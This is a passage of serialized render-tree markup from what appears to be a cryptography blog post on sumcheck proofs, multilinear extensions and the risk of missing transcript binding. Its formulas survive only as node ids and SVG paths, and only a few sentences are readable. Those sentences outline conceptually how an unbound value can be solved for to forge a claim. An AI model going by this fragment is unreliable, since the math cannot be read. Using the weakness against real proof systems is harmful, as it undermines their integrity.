,[118676],{"type":30,"value":10564},{"type":24,"tag":301,"props":118678,"children":118680},{"className":118679},[10920,10883],[118681],{"type":30,"value":10894},{"type":24,"tag":301,"props":118683,"children":118685},{"className":118684},[10835,10883],[118686],{"type":30,"value":546},{"type":24,"tag":301,"props":118688,"children":118690},{"className":118689},[28514],[118691],{"type":30,"value":28517},{"type":24,"tag":301,"props":118693,"children":118695},{"className":118694},[10860],[118696],{"type":24,"tag":301,"props":118697,"children":118699},{"className":118698,"style":117210},[10865],[118700],{"type":24,"tag":301,"props":118701,"children":118702},{},[],{"type":30,"value":118704},"! By induction, the final claim is linear in the original ",{"type":24,"tag":145,"props":118706,"children":118708},{"className":118707},[10807,10808],[118709],{"type":24,"tag":301,"props":118710,"children":118712},{"className":118711},[10813],[118713],{"type":24,"tag":301,"props":118714,"children":118716},{"className":118715,"ariaHidden":10819},[10818],[118717],{"type":24,"tag":301,"props":118718,"children":118720},{"className":118719},[10824],[118721,118725],{"type":24,"tag":301,"props":118722,"children":118724},{"className":118723,"style":28352},[10829],[],{"type":24,"tag":301,"props":118726,"children":118728},{"className":118727,"style":99979},[10835,28357],[118729],{"type":30,"value":99982},{"type":30,"value":118731},". If ",{"type":24,"tag":145,"props":118733,"children":118735},{"className":118734},[10807,10808],[118736],{"type":24,"tag":301,"props":118737,"children":118739},{"className":118738},[10813],[118740],{"type":24,"tag":301,"props":118741,"children":118743},{"className":118742,"ariaHidden":10819},[10818],[118744],{"type":24,"tag":301,"props":118745,"children":118747},{"className":118746},[10824],[118748,118752],{"type":24,"tag":301,"props":118749,"children":118751},{"className":118750,"style":28352},[10829],[],{"type":24,"tag":301,"props":118753,"children":118755},{"className":118754,"style":99979},[10835,28357],[118756],{"type":30,"value":99982},{"type":30,"value":118758}," isn't in the transcript, we can solve for it.",{"type":24,"tag":80,"props":118760,"children":118762},{"id":118761},"multilinear-extensions-mles",[118763],{"type":30,"value":118764},"Multilinear Extensions (MLEs)",{"type":24,"tag":32,"props":118766,"children":118767},{},[118768,118770,118855],{"type":30,"value":118769},"An MLE is just the polynomial view of a table over ",{"type":24,"tag":145,"props":118771,"children":118773},{"className":118772},[10807,10808],[118774],{"type":24,"tag":301,"props":118775,"children":118777},{"className":118776},[10813],[118778],{"type":24,"tag":301,"props":118779,"children":118781},{"className":118780,"ariaHidden":10819},[10818],[118782],{"type":24,"tag":301,"props":118783,"children":118785},{"className":118784},[10824],[118786,118790,118795,118800,118805,118809,118814],{"type":24,"tag":301,"props":118787,"children":118789},{"className":118788,"style":10935},[10829],[],{"type":24,"tag":301,"props":118791,"children":118793},{"className":118792},[28486],[118794],{"type":30,"value":83330},{"type":24,"tag":301,"props":118796,"children":118798},{"className":118797},[10835],[118799],{"type":30,"value":584},{"type":24,"tag":301,"props":118801,"children":118803},{"className":118802},[10946],[118804],{"type":30,"value":10949},{"type":24,"tag":301,"props":118806,"children":118808},{"className":118807,"style":10953},[10914],[],{"type":24,"tag":301,"props":118810,"children":118812},{"className":118811},[10835],[118813],{"type":30,"value":546},{"type":24,"tag":301,"props":118815,"children":118817},{"className":118816},[28508],[118818,118823],{"type":24,"tag":301,"props":118819,"children":118821},{"className":118820},[28508],[118822],{"type":30,"value":40889},{"type":24,"tag":301,"props":118824,"children":118826},{"className":118825},[10850],[118827],{"type":24,"tag":301,"props":118828,"children":118830},{"className":118829},[10855],[118831],{"type":24,"tag":301,"props":118832,"children":118834},{"className":118833},[10860],[118835],{"type":24,"tag":301,"props":118836,"children":118838},{"className":118837,"style":115458},[10865],[118839],{"type":24,"tag":301,"props":118840,"children":118841},{"style":10869},[118842,118846],{"type":24,"tag":301,"props":118843,"children":118845},{"className":118844,"style":10875},[10874],[],{"type":24,"tag":301,"props":118847,"children":118849},{"className":118848},[10880,10881,10882,10883],[118850],{"type":24,"tag":301,"props":118851,"children":118853},{"className":118852},[10835,28357,10883],[118854],{"type":30,"value":63123},{"type":30,"value":118856},": it matches the table on Boolean points and extends it to field points.",{"type":24,"tag":32,"props":118858,"children":118859},{},[118860],{"type":30,"value":118861},"For this post, the only property you need is:",{"type":24,"tag":32,"props":118863,"children":118864},{},[118865],{"type":24,"tag":145,"props":118866,"children":118868},{"className":118867},[10807,10808],[118869],{"type":24,"tag":301,"props":118870,"children":118872},{"className":118871},[10813],[118873],{"type":24,"tag":301,"props":118874,"children":118876},{"className":118875,"ariaHidden":10819},[10818],[118877,119039,119311],{"type":24,"tag":301,"props":118878,"children":118880},{"className":118879},[10824],[118881,118886,118955,118960,119021,119026,119030,119035],{"type":24,"tag":301,"props":118882,"children":118885},{"className":118883,"style":118884},[10829],"height:1.1813em;vertical-align:-0.25em;",[],{"type":24,"tag":301,"props":118887,"children":118890},{"className":118888},[10835,118889],"accent",[118891],{"type":24,"tag":301,"props":118892,"children":118894},{"className":118893},[10855,28411],[118895,118943],{"type":24,"tag":301,"props":118896,"children":118898},{"className":118897},[10860],[118899,118938],{"type":24,"tag":301,"props":118900,"children":118903},{"className":118901,"style":118902},[10865],"height:0.9313em;",[118904,118918],{"type":24,"tag":301,"props":118905,"children":118907},{"style":118906},"top:-3em;",[118908,118913],{"type":24,"tag":301,"props":118909,"children":118912},{"className":118910,"style":118911},[10874],"height:3em;",[],{"type":24,"tag":301,"props":118914,"children":118916},{"className":118915,"style":102098},[10835,28357],[118917],{"type":30,"value":39835},{"type":24,"tag":301,"props":118919,"children":118921},{"style":118920},"top:-3.6134em;",[118922,118926],{"type":24,"tag":301,"props":118923,"children":118925},{"className":118924,"style":118911},[10874],[],{"type":24,"tag":301,"props":118927,"children":118931},{"className":118928,"style":118930},[118929],"accent-body","left:-0.0833em;",[118932],{"type":24,"tag":301,"props":118933,"children":118935},{"className":118934},[10835],[118936],{"type":30,"value":118937},"~",{"type":24,"tag":301,"props":118939,"children":118941},{"className":118940},[28514],[118942],{"type":30,"value":28517},{"type":24,"tag":301,"props":118944,"children":118946},{"className":118945},[10860],[118947],{"type":24,"tag":301,"props":118948,"children":118951},{"className":118949,"style":118950},[10865],"height:0.1944em;",[118952],{"type":24,"tag":301,"props":118953,"children":118954},{},[],{"type":24,"tag":301,"props":118956,"children":118958},{"className":118957},[28486],[118959],{"type":30,"value":362},{"type":24,"tag":301,"props":118961,"children":118963},{"className":118962},[10835,118889],[118964],{"type":24,"tag":301,"props":118965,"children":118967},{"className":118966},[10855],[118968],{"type":24,"tag":301,"props":118969,"children":118971},{"className":118970},[10860],[118972],{"type":24,"tag":301,"props":118973,"children":118976},{"className":118974,"style":118975},[10865],"height:0.714em;",[118977,118989],{"type":24,"tag":301,"props":118978,"children":118979},{"style":118906},[118980,118984],{"type":24,"tag":301,"props":118981,"children":118983},{"className":118982,"style":118911},[10874],[],{"type":24,"tag":301,"props":118985,"children":118987},{"className":118986,"style":99745},[10835,28357],[118988],{"type":30,"value":100563},{"type":24,"tag":301,"props":118990,"children":118991},{"style":118906},[118992,118996],{"type":24,"tag":301,"props":118993,"children":118995},{"className":118994,"style":118911},[10874],[],{"type":24,"tag":301,"props":118997,"children":119000},{"className":118998,"style":118999},[118929],"left:-0.1799em;",[119001],{"type":24,"tag":301,"props":119002,"children":119006},{"className":119003,"style":119005},[119004],"overlay","height:0.714em;width:0.471em;",[119007],{"type":24,"tag":41022,"props":119008,"children":119015},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},"http://www.w3.org/2000/svg","0.471em","0.714em","width:0.471em","0 0 471 714","xMinYMin",[119016],{"type":24,"tag":119017,"props":119018,"children":119020},"path",{"d":119019},"M377 20c0-5.333 1.833-10 5.5-14S391 0 397 0c4.667 0 8.667 1.667 12 5\n3.333 2.667 6.667 9 10 19 6.667 24.667 20.333 43.667 41 57 7.333 4.667 11\n10.667 11 18 0 6-1 10-3 12s-6.667 5-14 9c-28.667 14.667-53.667 35.667-75 63\n-1.333 1.333-3.167 3.5-5.5 6.5s-4 4.833-5 5.5c-1 .667-2.5 1.333-4.5 2s-4.333 1\n-7 1c-4.667 0-9.167-1.833-13.5-5.5S337 184 337 178c0-12.667 15.667-32.333 47-59\nH213l-171-1c-8.667-6-13-12.333-13-19 0-4.667 4.333-11.333 13-20h359\nc-16-25.333-24-45-24-59z",[],{"type":24,"tag":301,"props":119022,"children":119024},{"className":119023},[28508],[119025],{"type":30,"value":9961},{"type":24,"tag":301,"props":119027,"children":119029},{"className":119028,"style":11012},[10914],[],{"type":24,"tag":301,"props":119031,"children":119033},{"className":119032},[11017],[119034],{"type":30,"value":523},{"type":24,"tag":301,"props":119036,"children":119038},{"className":119037,"style":11012},[10914],[],{"type":24,"tag":301,"props":119040,"children":119042},{"className":119041},[10824],[119043,119048,119229,119233,119238,119243,119293,119298,119302,119307],{"type":24,"tag":301,"props":119044,"children":119047},{"className":119045,"style":119046},[10829],"height:1.4918em;vertical-align:-0.5144em;",[],{"type":24,"tag":301,"props":119049,"children":119051},{"className":119050},[28393],[119052,119057],{"type":24,"tag":301,"props":119053,"children":119055},{"className":119054,"style":28400},[28393,28398,28399],[119056],{"type":30,"value":115536},{"type":24,"tag":301,"props":119058,"children":119060},{"className":119059},[10850],[119061],{"type":24,"tag":301,"props":119062,"children":119064},{"className":119063},[10855,28411],[119065,119217],{"type":24,"tag":301,"props":119066,"children":119068},{"className":119067},[10860],[119069,119212],{"type":24,"tag":301,"props":119070,"children":119073},{"className":119071,"style":119072},[10865],"height:0.3448em;",[119074],{"type":24,"tag":301,"props":119075,"children":119077},{"style":119076},"top:-2.3606em;margin-left:0em;margin-right:0.05em;",[119078,119082],{"type":24,"tag":301,"props":119079,"children":119081},{"className":119080,"style":10875},[10874],[],{"type":24,"tag":301,"props":119083,"children":119085},{"className":119084},[10880,10881,10882,10883],[119086],{"type":24,"tag":301,"props":119087,"children":119089},{"className":119088},[10835,10883],[119090,119144,119149,119154,119159,119164,119169],{"type":24,"tag":301,"props":119091,"children":119093},{"className":119092},[10835,118889,10883],[119094],{"type":24,"tag":301,"props":119095,"children":119097},{"className":119096},[10855],[119098],{"type":24,"tag":301,"props":119099,"children":119101},{"className":119100},[10860],[119102],{"type":24,"tag":301,"props":119103,"children":119106},{"className":119104,"style":119105},[10865],"height:0.9774em;",[119107,119121],{"type":24,"tag":301,"props":119108,"children":119110},{"style":119109},"top:-2.714em;",[119111,119116],{"type":24,"tag":301,"props":119112,"children":119115},{"className":119113,"style":119114},[10874],"height:2.714em;",[],{"type":24,"tag":301,"props":119117,"children":119119},{"className":119118},[10835,28357,10883],[119120],{"type":30,"value":5613},{"type":24,"tag":301,"props":119122,"children":119124},{"style":119123},"top:-2.9774em;",[119125,119129],{"type":24,"tag":301,"props":119126,"children":119128},{"className":119127,"style":119114},[10874],[],{"type":24,"tag":301,"props":119130,"children":119133},{"className":119131,"style":119132},[118929],"left:-0.2355em;",[119134],{"type":24,"tag":301,"props":119135,"children":119137},{"className":119136,"style":119005},[119004,10883],[119138],{"type":24,"tag":41022,"props":119139,"children":119140},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119141],{"type":24,"tag":119017,"props":119142,"children":119143},{"d":119019},[],{"type":24,"tag":301,"props":119145,"children":119147},{"className":119146},[11017,10883],[119148],{"type":30,"value":28464},{"type":24,"tag":301,"props":119150,"children":119152},{"className":119151},[28486,10883],[119153],{"type":30,"value":83330},{"type":24,"tag":301,"props":119155,"children":119157},{"className":119156},[10835,10883],[119158],{"type":30,"value":584},{"type":24,"tag":301,"props":119160,"children":119162},{"className":119161},[10946,10883],[119163],{"type":30,"value":10949},{"type":24,"tag":301,"props":119165,"children":119167},{"className":119166},[10835,10883],[119168],{"type":30,"value":546},{"type":24,"tag":301,"props":119170,"children":119172},{"className":119171},[28508,10883],[119173,119178],{"type":24,"tag":301,"props":119174,"children":119176},{"className":119175},[28508,10883],[119177],{"type":30,"value":40889},{"type":24,"tag":301,"props":119179,"children":119181},{"className":119180},[10850],[119182],{"type":24,"tag":301,"props":119183,"children":119185},{"className":119184},[10855],[119186],{"type":24,"tag":301,"props":119187,"children":119189},{"className":119188},[10860],[119190],{"type":24,"tag":301,"props":119191,"children":119194},{"className":119192,"style":119193},[10865],"height:0.5935em;",[119195],{"type":24,"tag":301,"props":119196,"children":119198},{"style":119197},"top:-2.786em;margin-right:0.0714em;",[119199,119203],{"type":24,"tag":301,"props":119200,"children":119202},{"className":119201,"style":115601},[10874],[],{"type":24,"tag":301,"props":119204,"children":119206},{"className":119205},[10880,115606,115607,10883],[119207],{"type":24,"tag":301,"props":119208,"children":119210},{"className":119209},[10835,28357,10883],[119211],{"type":30,"value":63123},{"type":24,"tag":301,"props":119213,"children":119215},{"className":119214},[28514],[119216],{"type":30,"value":28517},{"type":24,"tag":301,"props":119218,"children":119220},{"className":119219},[10860],[119221],{"type":24,"tag":301,"props":119222,"children":119225},{"className":119223,"style":119224},[10865],"height:0.5144em;",[119226],{"type":24,"tag":301,"props":119227,"children":119228},{},[],{"type":24,"tag":301,"props":119230,"children":119232},{"className":119231,"style":10953},[10914],[],{"type":24,"tag":301,"props":119234,"children":119236},{"className":119235,"style":102098},[10835,28357],[119237],{"type":30,"value":39835},{"type":24,"tag":301,"props":119239,"children":119241},{"className":119240},[28486],[119242],{"type":30,"value":362},{"type":24,"tag":301,"props":119244,"children":119246},{"className":119245},[10835,118889],[119247],{"type":24,"tag":301,"props":119248,"children":119250},{"className":119249},[10855],[119251],{"type":24,"tag":301,"props":119252,"children":119254},{"className":119253},[10860],[119255],{"type":24,"tag":301,"props":119256,"children":119258},{"className":119257,"style":119105},[10865],[119259,119271],{"type":24,"tag":301,"props":119260,"children":119261},{"style":118906},[119262,119266],{"type":24,"tag":301,"props":119263,"children":119265},{"className":119264,"style":118911},[10874],[],{"type":24,"tag":301,"props":119267,"children":119269},{"className":119268},[10835,28357],[119270],{"type":30,"value":5613},{"type":24,"tag":301,"props":119272,"children":119274},{"style":119273},"top:-3.2634em;",[119275,119279],{"type":24,"tag":301,"props":119276,"children":119278},{"className":119277,"style":118911},[10874],[],{"type":24,"tag":301,"props":119280,"children":119282},{"className":119281,"style":119132},[118929],[119283],{"type":24,"tag":301,"props":119284,"children":119286},{"className":119285,"style":119005},[119004],[119287],{"type":24,"tag":41022,"props":119288,"children":119289},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119290],{"type":24,"tag":119017,"props":119291,"children":119292},{"d":119019},[],{"type":24,"tag":301,"props":119294,"children":119296},{"className":119295},[28508],[119297],{"type":30,"value":9961},{"type":24,"tag":301,"props":119299,"children":119301},{"className":119300,"style":10915},[10914],[],{"type":24,"tag":301,"props":119303,"children":119305},{"className":119304},[10920],[119306],{"type":30,"value":118002},{"type":24,"tag":301,"props":119308,"children":119310},{"className":119309,"style":10915},[10914],[],{"type":24,"tag":301,"props":119312,"children":119314},{"className":119313},[10824],[119315,119320,119330,119335,119384,119389,119393,119442],{"type":24,"tag":301,"props":119316,"children":119319},{"className":119317,"style":119318},[10829],"height:1.2274em;vertical-align:-0.25em;",[],{"type":24,"tag":301,"props":119321,"children":119323},{"className":119322},[10835,30],[119324],{"type":24,"tag":301,"props":119325,"children":119327},{"className":119326},[10835],[119328],{"type":30,"value":119329},"eq",{"type":24,"tag":301,"props":119331,"children":119333},{"className":119332},[28486],[119334],{"type":30,"value":362},{"type":24,"tag":301,"props":119336,"children":119338},{"className":119337},[10835,118889],[119339],{"type":24,"tag":301,"props":119340,"children":119342},{"className":119341},[10855],[119343],{"type":24,"tag":301,"props":119344,"children":119346},{"className":119345},[10860],[119347],{"type":24,"tag":301,"props":119348,"children":119350},{"className":119349,"style":119105},[10865],[119351,119363],{"type":24,"tag":301,"props":119352,"children":119353},{"style":118906},[119354,119358],{"type":24,"tag":301,"props":119355,"children":119357},{"className":119356,"style":118911},[10874],[],{"type":24,"tag":301,"props":119359,"children":119361},{"className":119360},[10835,28357],[119362],{"type":30,"value":5613},{"type":24,"tag":301,"props":119364,"children":119365},{"style":119273},[119366,119370],{"type":24,"tag":301,"props":119367,"children":119369},{"className":119368,"style":118911},[10874],[],{"type":24,"tag":301,"props":119371,"children":119373},{"className":119372,"style":119132},[118929],[119374],{"type":24,"tag":301,"props":119375,"children":119377},{"className":119376,"style":119005},[119004],[119378],{"type":24,"tag":41022,"props":119379,"children":119380},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119381],{"type":24,"tag":119017,"props":119382,"children":119383},{"d":119019},[],{"type":24,"tag":301,"props":119385,"children":119387},{"className":119386},[10946],[119388],{"type":30,"value":10949},{"type":24,"tag":301,"props":119390,"children":119392},{"className":119391,"style":10953},[10914],[],{"type":24,"tag":301,"props":119394,"children":119396},{"className":119395},[10835,118889],[119397],{"type":24,"tag":301,"props":119398,"children":119400},{"className":119399},[10855],[119401],{"type":24,"tag":301,"props":119402,"children":119404},{"className":119403},[10860],[119405],{"type":24,"tag":301,"props":119406,"children":119408},{"className":119407,"style":118975},[10865],[119409,119421],{"type":24,"tag":301,"props":119410,"children":119411},{"style":118906},[119412,119416],{"type":24,"tag":301,"props":119413,"children":119415},{"className":119414,"style":118911},[10874],[],{"type":24,"tag":301,"props":119417,"children":119419},{"className":119418,"style":99745},[10835,28357],[119420],{"type":30,"value":100563},{"type":24,"tag":301,"props":119422,"children":119423},{"style":118906},[119424,119428],{"type":24,"tag":301,"props":119425,"children":119427},{"className":119426,"style":118911},[10874],[],{"type":24,"tag":301,"props":119429,"children":119431},{"className":119430,"style":118999},[118929],[119432],{"type":24,"tag":301,"props":119433,"children":119435},{"className":119434,"style":119005},[119004],[119436],{"type":24,"tag":41022,"props":119437,"children":119438},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119439],{"type":24,"tag":119017,"props":119440,"children":119441},{"d":119019},[],{"type":24,"tag":301,"props":119443,"children":119445},{"className":119444},[28508],[119446],{"type":30,"value":9961},{"type":24,"tag":32,"props":119448,"children":119449},{},[119450,119452,119521,119523,119669,119671,119810,119812,119896],{"type":30,"value":119451},"At a fixed challenge point ",{"type":24,"tag":145,"props":119453,"children":119455},{"className":119454},[10807,10808],[119456],{"type":24,"tag":301,"props":119457,"children":119459},{"className":119458},[10813],[119460],{"type":24,"tag":301,"props":119461,"children":119463},{"className":119462,"ariaHidden":10819},[10818],[119464],{"type":24,"tag":301,"props":119465,"children":119467},{"className":119466},[10824],[119468,119472],{"type":24,"tag":301,"props":119469,"children":119471},{"className":119470,"style":118975},[10829],[],{"type":24,"tag":301,"props":119473,"children":119475},{"className":119474},[10835,118889],[119476],{"type":24,"tag":301,"props":119477,"children":119479},{"className":119478},[10855],[119480],{"type":24,"tag":301,"props":119481,"children":119483},{"className":119482},[10860],[119484],{"type":24,"tag":301,"props":119485,"children":119487},{"className":119486,"style":118975},[10865],[119488,119500],{"type":24,"tag":301,"props":119489,"children":119490},{"style":118906},[119491,119495],{"type":24,"tag":301,"props":119492,"children":119494},{"className":119493,"style":118911},[10874],[],{"type":24,"tag":301,"props":119496,"children":119498},{"className":119497,"style":99745},[10835,28357],[119499],{"type":30,"value":100563},{"type":24,"tag":301,"props":119501,"children":119502},{"style":118906},[119503,119507],{"type":24,"tag":301,"props":119504,"children":119506},{"className":119505,"style":118911},[10874],[],{"type":24,"tag":301,"props":119508,"children":119510},{"className":119509,"style":118999},[118929],[119511],{"type":24,"tag":301,"props":119512,"children":119514},{"className":119513,"style":119005},[119004],[119515],{"type":24,"tag":41022,"props":119516,"children":119517},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119518],{"type":24,"tag":119017,"props":119519,"children":119520},{"d":119019},[],{"type":30,"value":119522},", the coefficients ",{"type":24,"tag":145,"props":119524,"children":119526},{"className":119525},[10807,10808],[119527],{"type":24,"tag":301,"props":119528,"children":119530},{"className":119529},[10813],[119531],{"type":24,"tag":301,"props":119532,"children":119534},{"className":119533,"ariaHidden":10819},[10818],[119535],{"type":24,"tag":301,"props":119536,"children":119538},{"className":119537},[10824],[119539,119543,119552,119557,119606,119611,119615,119664],{"type":24,"tag":301,"props":119540,"children":119542},{"className":119541,"style":119318},[10829],[],{"type":24,"tag":301,"props":119544,"children":119546},{"className":119545},[10835,30],[119547],{"type":24,"tag":301,"props":119548,"children":119550},{"className":119549},[10835],[119551],{"type":30,"value":119329},{"type":24,"tag":301,"props":119553,"children":119555},{"className":119554},[28486],[119556],{"type":30,"value":362},{"type":24,"tag":301,"props":119558,"children":119560},{"className":119559},[10835,118889],[119561],{"type":24,"tag":301,"props":119562,"children":119564},{"className":119563},[10855],[119565],{"type":24,"tag":301,"props":119566,"children":119568},{"className":119567},[10860],[119569],{"type":24,"tag":301,"props":119570,"children":119572},{"className":119571,"style":119105},[10865],[119573,119585],{"type":24,"tag":301,"props":119574,"children":119575},{"style":118906},[119576,119580],{"type":24,"tag":301,"props":119577,"children":119579},{"className":119578,"style":118911},[10874],[],{"type":24,"tag":301,"props":119581,"children":119583},{"className":119582},[10835,28357],[119584],{"type":30,"value":5613},{"type":24,"tag":301,"props":119586,"children":119587},{"style":119273},[119588,119592],{"type":24,"tag":301,"props":119589,"children":119591},{"className":119590,"style":118911},[10874],[],{"type":24,"tag":301,"props":119593,"children":119595},{"className":119594,"style":119132},[118929],[119596],{"type":24,"tag":301,"props":119597,"children":119599},{"className":119598,"style":119005},[119004],[119600],{"type":24,"tag":41022,"props":119601,"children":119602},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119603],{"type":24,"tag":119017,"props":119604,"children":119605},{"d":119019},[],{"type":24,"tag":301,"props":119607,"children":119609},{"className":119608},[10946],[119610],{"type":30,"value":10949},{"type":24,"tag":301,"props":119612,"children":119614},{"className":119613,"style":10953},[10914],[],{"type":24,"tag":301,"props":119616,"children":119618},{"className":119617},[10835,118889],[119619],{"type":24,"tag":301,"props":119620,"children":119622},{"className":119621},[10855],[119623],{"type":24,"tag":301,"props":119624,"children":119626},{"className":119625},[10860],[119627],{"type":24,"tag":301,"props":119628,"children":119630},{"className":119629,"style":118975},[10865],[119631,119643],{"type":24,"tag":301,"props":119632,"children":119633},{"style":118906},[119634,119638],{"type":24,"tag":301,"props":119635,"children":119637},{"className":119636,"style":118911},[10874],[],{"type":24,"tag":301,"props":119639,"children":119641},{"className":119640,"style":99745},[10835,28357],[119642],{"type":30,"value":100563},{"type":24,"tag":301,"props":119644,"children":119645},{"style":118906},[119646,119650],{"type":24,"tag":301,"props":119647,"children":119649},{"className":119648,"style":118911},[10874],[],{"type":24,"tag":301,"props":119651,"children":119653},{"className":119652,"style":118999},[118929],[119654],{"type":24,"tag":301,"props":119655,"children":119657},{"className":119656,"style":119005},[119004],[119658],{"type":24,"tag":41022,"props":119659,"children":119660},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119661],{"type":24,"tag":119017,"props":119662,"children":119663},{"d":119019},[],{"type":24,"tag":301,"props":119665,"children":119667},{"className":119666},[28508],[119668],{"type":30,"value":9961},{"type":30,"value":119670}," are constants, so ",{"type":24,"tag":145,"props":119672,"children":119674},{"className":119673},[10807,10808],[119675],{"type":24,"tag":301,"props":119676,"children":119678},{"className":119677},[10813],[119679],{"type":24,"tag":301,"props":119680,"children":119682},{"className":119681,"ariaHidden":10819},[10818],[119683],{"type":24,"tag":301,"props":119684,"children":119686},{"className":119685},[10824],[119687,119691,119751,119756,119805],{"type":24,"tag":301,"props":119688,"children":119690},{"className":119689,"style":118884},[10829],[],{"type":24,"tag":301,"props":119692,"children":119694},{"className":119693},[10835,118889],[119695],{"type":24,"tag":301,"props":119696,"children":119698},{"className":119697},[10855,28411],[119699,119740],{"type":24,"tag":301,"props":119700,"children":119702},{"className":119701},[10860],[119703,119735],{"type":24,"tag":301,"props":119704,"children":119706},{"className":119705,"style":118902},[10865],[119707,119719],{"type":24,"tag":301,"props":119708,"children":119709},{"style":118906},[119710,119714],{"type":24,"tag":301,"props":119711,"children":119713},{"className":119712,"style":118911},[10874],[],{"type":24,"tag":301,"props":119715,"children":119717},{"className":119716,"style":102098},[10835,28357],[119718],{"type":30,"value":39835},{"type":24,"tag":301,"props":119720,"children":119721},{"style":118920},[119722,119726],{"type":24,"tag":301,"props":119723,"children":119725},{"className":119724,"style":118911},[10874],[],{"type":24,"tag":301,"props":119727,"children":119729},{"className":119728,"style":118930},[118929],[119730],{"type":24,"tag":301,"props":119731,"children":119733},{"className":119732},[10835],[119734],{"type":30,"value":118937},{"type":24,"tag":301,"props":119736,"children":119738},{"className":119737},[28514],[119739],{"type":30,"value":28517},{"type":24,"tag":301,"props":119741,"children":119743},{"className":119742},[10860],[119744],{"type":24,"tag":301,"props":119745,"children":119747},{"className":119746,"style":118950},[10865],[119748],{"type":24,"tag":301,"props":119749,"children":119750},{},[],{"type":24,"tag":301,"props":119752,"children":119754},{"className":119753},[28486],[119755],{"type":30,"value":362},{"type":24,"tag":301,"props":119757,"children":119759},{"className":119758},[10835,118889],[119760],{"type":24,"tag":301,"props":119761,"children":119763},{"className":119762},[10855],[119764],{"type":24,"tag":301,"props":119765,"children":119767},{"className":119766},[10860],[119768],{"type":24,"tag":301,"props":119769,"children":119771},{"className":119770,"style":118975},[10865],[119772,119784],{"type":24,"tag":301,"props":119773,"children":119774},{"style":118906},[119775,119779],{"type":24,"tag":301,"props":119776,"children":119778},{"className":119777,"style":118911},[10874],[],{"type":24,"tag":301,"props":119780,"children":119782},{"className":119781,"style":99745},[10835,28357],[119783],{"type":30,"value":100563},{"type":24,"tag":301,"props":119785,"children":119786},{"style":118906},[119787,119791],{"type":24,"tag":301,"props":119788,"children":119790},{"className":119789,"style":118911},[10874],[],{"type":24,"tag":301,"props":119792,"children":119794},{"className":119793,"style":118999},[118929],[119795],{"type":24,"tag":301,"props":119796,"children":119798},{"className":119797,"style":119005},[119004],[119799],{"type":24,"tag":41022,"props":119800,"children":119801},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119802],{"type":24,"tag":119017,"props":119803,"children":119804},{"d":119019},[],{"type":24,"tag":301,"props":119806,"children":119808},{"className":119807},[28508],[119809],{"type":30,"value":9961},{"type":30,"value":119811}," is linear in the table values ",{"type":24,"tag":145,"props":119813,"children":119815},{"className":119814},[10807,10808],[119816],{"type":24,"tag":301,"props":119817,"children":119819},{"className":119818},[10813],[119820],{"type":24,"tag":301,"props":119821,"children":119823},{"className":119822,"ariaHidden":10819},[10818],[119824],{"type":24,"tag":301,"props":119825,"children":119827},{"className":119826},[10824],[119828,119832,119837,119842,119891],{"type":24,"tag":301,"props":119829,"children":119831},{"className":119830,"style":119318},[10829],[],{"type":24,"tag":301,"props":119833,"children":119835},{"className":119834,"style":102098},[10835,28357],[119836],{"type":30,"value":39835},{"type":24,"tag":301,"props":119838,"children":119840},{"className":119839},[28486],[119841],{"type":30,"value":362},{"type":24,"tag":301,"props":119843,"children":119845},{"className":119844},[10835,118889],[119846],{"type":24,"tag":301,"props":119847,"children":119849},{"className":119848},[10855],[119850],{"type":24,"tag":301,"props":119851,"children":119853},{"className":119852},[10860],[119854],{"type":24,"tag":301,"props":119855,"children":119857},{"className":119856,"style":119105},[10865],[119858,119870],{"type":24,"tag":301,"props":119859,"children":119860},{"style":118906},[119861,119865],{"type":24,"tag":301,"props":119862,"children":119864},{"className":119863,"style":118911},[10874],[],{"type":24,"tag":301,"props":119866,"children":119868},{"className":119867},[10835,28357],[119869],{"type":30,"value":5613},{"type":24,"tag":301,"props":119871,"children":119872},{"style":119273},[119873,119877],{"type":24,"tag":301,"props":119874,"children":119876},{"className":119875,"style":118911},[10874],[],{"type":24,"tag":301,"props":119878,"children":119880},{"className":119879,"style":119132},[118929],[119881],{"type":24,"tag":301,"props":119882,"children":119884},{"className":119883,"style":119005},[119004],[119885],{"type":24,"tag":41022,"props":119886,"children":119887},{"xmlns":119009,"width":119010,"height":119011,"style":119012,"viewBox":119013,"preserveAspectRatio":119014},[119888],{"type":24,"tag":119017,"props":119889,"children":119890},{"d":119019},[],{"type":24,"tag":301,"props":119892,"children":119894},{"className":119893},[28508],[119895],{"type":30,"value":9961},{"type":30,"value":206},{"type":24,"tag":32,"props":119898,"children":119899},{},[119900,119902,119971],{"type":30,"value":119901},"That linearity is exactly why missing transcript binding is dangerous: if ",{"type":24,"tag":145,"props":119903,"children":119905},{"className":119904},[10807,10808],[119906],{"type":24,"tag":301,"props":119907,"children":119909},{"className":119908},[10813],[119910],{"type":24,"tag":301,"props":119911,"children":119913},{"className":119912,"ariaHidden":10819},[10818],[119914],{"type":24,"tag":301,"props":119915,"children":119917},{"className":119916},[10824],[119918,119922],{"type":24,"tag":301,"props":119919,"children":119921},{"className":119920,"style":118975},[10829],[],{"type":24,"tag":301,"props":119923,"children":119925},{"className":119924},[10835,118889],[119926],{"type":24,"tag":301,"props":119927,"children":119929},{"className":119928},[10855],[119930],{"type":24,"tag":301,"props":119931,"children":119933},{"className":119932},[10860],[119934],{"type":24,"tag":301,"props":119935,"children":119937},{"className":119936,"style":118975},[10865],[119938,119950],{"type":24,"tag":301,"props":119939,"children":119940},{"style":118906},[119941,119945],{"type":24,"tag":301,"props":119942,"children":119944},{"className":119943,"style":118911},[10874],[],{"type":24,"tag":301,"props":119946,"children":119948},{"className":119947,"style":99745},[10835,28357],[119949],{"type":30,"value":100563},{"type":24,"tag":301,"props":119951,"children":119952},{"style":118906},[119953,119957],{"type":24,"tag":301,"props":119954,"children":119956},{"className":119955,"style":118911},[10874],[],{"type":24,"tag":301,"props":119958,"chil